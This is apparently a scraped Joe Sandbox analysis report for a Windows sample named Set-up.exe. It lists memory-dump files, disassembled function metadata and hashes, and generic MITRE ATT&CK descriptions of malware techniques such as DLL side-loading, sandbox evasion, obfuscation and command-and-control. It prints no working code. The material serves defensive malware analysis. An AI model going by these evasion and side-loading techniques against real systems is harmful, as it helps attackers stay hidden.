Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: dbf9aff5ee0786e0516a8789c7a0a5d6dedbc19d442b50162b924f2adf8c788f
Instruction ID: 9a3aa572d56f9a789eeb2a2f88548fe8278aa0acf75f125e674bcd3d691d9ea4
Opcode Fuzzy Hash: dbf9aff5ee0786e0516a8789c7a0a5d6dedbc19d442b50162b924f2adf8c788f
Instruction Fuzzy Hash: BD018676A001508FEA60BF5AE845D1BB7D5EF90764F0D8479E5498B2A2D730EC409BB1

Function 00DD2810 Relevance: 5.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00DBD8A5,?), ref: 00DD281B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00DD2826
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00DD2831
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00DD283A

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 8126f2f83da0042efe373529c6a6ddbb5a68456864cd6a4970c3e37437b27748
Instruction ID: 6d6dc32c303371e036aae6cb1f953ee36b6d20f3134fbc09a5f7952c3cb0d645
Opcode Fuzzy Hash: 8126f2f83da0042efe373529c6a6ddbb5a68456864cd6a4970c3e37437b27748
Instruction Fuzzy Hash: E6D012B6C055545FF5123A11BC0244B76959E70338F080A34F84D212A6EA12AD2565F3

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Windows Analysis Report
Set-up.exe

Function 00A629FF Relevance: 63.3, APIs: 20, Strings: 16, Instructions: 321
stringprocessregistryCOMMON

Function 00A6255D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 282
filestringCOMMON

Function 00DF8D9A Relevance: 45.6, APIs: 16, Strings: 10, Instructions: 134
filelibraryloaderCOMMON

Function 00B2AA30 Relevance: 19.9, APIs: 13, Instructions: 364
networkCOMMON

Function 00A6116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 00DE8E90 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 00F3C070 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
COMMON

Function 00A705B0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 369
networkCOMMON

Function 00B29740 Relevance: 34.0, APIs: 12, Strings: 7, Instructions: 736
registrystringCOMMON

Function 00A62F17 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 144
registryCOMMON

Function 00C3E5D0 Relevance: 19.6, APIs: 13, Instructions: 107
filestringCOMMON

Function 00A98B50 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 263
networkCOMMON

Function 00A676A0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 69
networkCOMMON

Function 00BE47B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 95
stringCOMMON

Function 00A631D7 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73
processCOMMON